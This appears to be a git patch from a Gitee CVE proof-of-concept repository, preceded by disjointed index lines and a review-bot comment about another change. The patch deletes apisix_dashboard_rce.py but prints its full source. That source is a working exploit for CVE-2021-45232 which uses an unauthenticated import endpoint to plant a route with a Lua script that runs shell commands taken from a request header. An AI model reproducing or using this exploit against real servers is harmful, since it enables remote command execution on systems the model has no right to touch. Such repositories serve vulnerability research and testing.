java-spring-cloud-gateway: - CVE-2022-22947 + java-spring-security: + - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 unzip: -- Gitee 
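Review bot: The index gains `java-spring-security:` / `- CVE-2022-22978` while the same patch deletes cve/zabbix/2022/yaml/CVE-2022-23131.yaml with no corresponding index removal visible in this hunk; if other_list.yaml (or the sibling index it feeds) carries a zabbix entry for CVE-2022-23131, that entry now points at a file that no longer exists. The CVE-2022-23131 README and CVE-2022-23131.py are kept (only re-emitted) in this patch, and the commit subject lists the new CVE-2022-22978 files and the other_list.yaml change but not this deletion, so the yaml removal looks unintended. Either restore the yaml alongside the retained PoC directory or remove any index entry that references it, and state the deletion in the commit message. The hunk shows only the `cve:` section from `- CVE-2021-1056` to `unzip:`, so whether a zabbix key exists elsewhere in the file cannot be confirmed from here.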
From 7e602f80c855cc07036ec0e84f6cc7476f4ddc08 Mon Sep 17 00:00:00 2001 From: Zhangqichen131 Date: Thu, 6 Apr 2023 09:44:17 +0000 Subject: [PATCH 2/2] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?Apache-APISIX/2021/cve-2021-45232/apisix=5Fdashboard=5Frce.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../cve-2021-45232/apisix_dashboard_rce.py | 93 ------------------- 1 file changed, 93 deletions(-) delete mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py deleted file mode 100644 index 30ebcda5..00000000 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ /dev/null 
@@ -1,93 +0,0 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + "/" 
+ uri) - else: - print("attack error") \ No newline at end of file -- Gitee